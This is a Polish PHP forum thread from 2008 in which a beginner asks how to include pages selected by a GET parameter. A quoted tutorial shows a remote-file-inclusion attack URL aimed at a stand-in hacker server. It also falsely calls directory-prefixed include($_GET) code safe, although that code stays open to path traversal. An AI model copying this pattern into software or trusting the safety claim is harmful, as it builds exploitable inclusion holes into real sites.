 [php] includowanie linków |
| [php] includowanie linków |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 40 Pomógł: 0 Dołączył: 20.02.2008 Ostrzeżenie: (0%) 
 |
Mam taki kod:
Kod <?php $plik1 = "katalog/$_GET[lol]".".php"; include($plik1); ?> i link: Kod <a href="katalog/index.php?lol=plik1" onfocus=blur()>link1</a> Jak przekształcic ten pierwszy kod bym mógł includowac wiecej linków? Wczesniej to robiłem w taki sposób: Kod <? switch ($_GET['lol']) { case 1: include ("katalog/plik1.php"); break; case 2: include ("katalog/plik2.php"); break; } ?> ale był to niebezpieczny sposób Ten post edytował predator 23.02.2008, 17:13:03 |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 40 Pomógł: 0 Dołączył: 20.02.2008 Ostrzeżenie: (0%)
|
juz sobie poradziłem
Kod <?php $plik1 = "katalog/$_GET[lol1]".".php"; include($plik1); ?> <?php $plik2 = "katalog/$_GET[lol]".".php"; include($plik2); ?> zmieniłem w kazdym includowaniu "lol" i przy kazdym linku bede musial dodawac inny numerek :/ nie wygodne to przedtem takim sposobem ale gdy tu i tam było to samo słowo "lol" to mi includowalo 2 pliki na raz gdy kliknąłem w jeden link podaje cytat tego tutka: Cytat Kod <?php include($_GET['adres']); ?> Powoduje to oczywiście dołączenie pliku podanego w zmiennej, ale jest to bardzo NIEBEZPIECZNE, ponieważ każdy może do tej zmiennej wpisać co mu się żywnie podoba, np. Kod naszastrona.pl?adres=http://serwerhackera.pl/niszcz.php Pierwszym co należy robić to nie podawać rozszerzenia w adresie strony, czyli adres wygląda tak Kod naszastrona.pl/index.php?adres=plik a w kodzie będziemy mieli Kod <?php $plik = "$_GET[adres]".".php"; include($plik); ?> Jest to już jakaś forma zabezpieczenia, ale wystarczy, że hacker zgadnie to rozszerzenie które dodajemy, i dalej może wczytać swój plik Kod naszastrona.pl?adres=http://serwerhackera.pl/niszcz Aby skrypt stał się bezpieczny musimy wymusić katalog z którego będziemy ładowali pliki... adres ciągle taki: Kod naszastrona.pl/index.php?adres=plik ale w kodzie zaszły zmiany Kod <?php $plik = "katalog/$_GET[adres]".".php"; include($plik); ?> Ostatnia wersja naszego skryptu jest już bezpieczna, ponieważ wczytuje ze zgóry narzuconego katalogu "katalog"... |
|
|
|
predator [php] includowanie linków 23.02.2008, 16:58:36 
l0ud Cytat(predator @ 23.02.2008, 16:58:36... 23.02.2008, 17:01:44 Cysiaczek Dlaczego niebezpieczny? Właśnie bardzo b... 23.02.2008, 17:05:53 predator http://www.webtips.pl/index.php?showtopic=3899... 23.02.2008, 17:24:31 l0ud Sposób który stosowałeś wcześniej, był jak najbard... 23.02.2008, 17:29:06 Cysiaczek ...
Teraz to już wogóle nie rozumiem. Może zmie... 23.02.2008, 17:31:16 Cysiaczek To teraz popatrz na kod, który pokazałe... 23.02.2008, 17:45:57 l0ud A ja jeszcze dodam coś od siebie, dlaczego Tw... 23.02.2008, 17:57:15 predator hmm chyba i macie racje ale w tym przykładzie co j... 23.02.2008, 18:21:25 l0ud Pomyśl logicznie:
[PHP] pobierz, plaintext <?p... 23.02.2008, 18:24:59 Synapsa A może w ten sposób.
[PHP] pobierz, plaintext ... 23.02.2008, 18:37:38 
l0ud Cytat(Synapsa @ 23.02.2008, 18:37:38 ... 23.02.2008, 18:43:37 predator ja dopiero sie ucze php ale rozumiem juz, dziękuje... 23.02.2008, 18:41:19 predator mam jeszcze pytanie, co oznacza fragment:
Kod... 23.02.2008, 19:13:57 empuszek [PHP] pobierz, plaintext <?php$page=(intege... 23.02.2008, 19:43:53 predator a jaki to ma udział w bezpieczeństwie tego kodu? 23.02.2008, 20:34:21 l0ud Cytat(predator @ 23.02.2008, 20:34:21... 23.02.2008, 21:38:08  |
|
Aktualny czas: 26.12.2025 - 13:32 |
